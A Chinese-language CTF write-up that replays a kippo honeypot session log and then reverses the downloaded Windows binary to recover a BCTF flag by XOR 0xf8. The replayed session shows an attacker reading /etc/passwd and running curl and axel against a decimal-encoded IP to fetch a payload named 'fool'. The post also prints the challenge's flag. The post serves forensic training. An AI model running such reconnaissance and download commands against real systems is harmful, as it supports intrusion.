about 4 years ago

這題在沒有提示 2 時其實嘗試了很久... 但都沒有結果就在此略過。
(只知道是個 dionaea 的 replay,中間做了點沒看懂的 IPC to /BROWSER)

有了提示 2 後,我們可以用 kippo 這個工具來 replay。

$ python kippo-0.8/utils/playlog.py kippo.ttylog.692ce16db7d940cb9ec52a8419800423
nas3:~# whoami
root
nas3:~# pwd
/root
nas3:~# cd /
nas3:/# ls
lost+found vmlinuz    srv        sys        run        sbin       proc       mnt        bin        usr        tmp        var        initrd.img etc        opt
boot       selinux    home       media      lib        root       dev
nas3:/# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
richard:x:1000:1000:Richard Texas,,,:/home/richard:/bin/bash
nas3:/# cd tmp/
nas3:/tmp# ls
nas3:/tmp# touch 1.sh
nas3:/tmp# ls
1.sh
nas3:/tmp# axel 2792326331/fool
bash: axel: command not found
nas3:/tmp# curl 2792326331/fool
bash: curl: command not found
nas3:/tmp# uname -r
Linux
nas3:/tmp# rm 1.sh
nas3:/tmp# exit
Connection to server closed.

(原本是會一個字元一個字元打出來,超酷的)

好呀,顯然要看看 2792326331/fool 是什麼。


Google Chrome 真懂我 XD

把這個檔案載下來後可以得到:

$ file fool
fool: PE32 executable (console) Intel 80386, for MS Windows

交給隊上負責逆向的人~

sub_4011C0() 那串就一臉 key 樣
每位 xor 0xf8 接起來

FLAG: BCTF{Y0u_6oT_It_7WxMQ_jjR4P_mE9bV}

← BCTF 情报窃取 Writeup BCTF 他鄉遇故知 Writeup →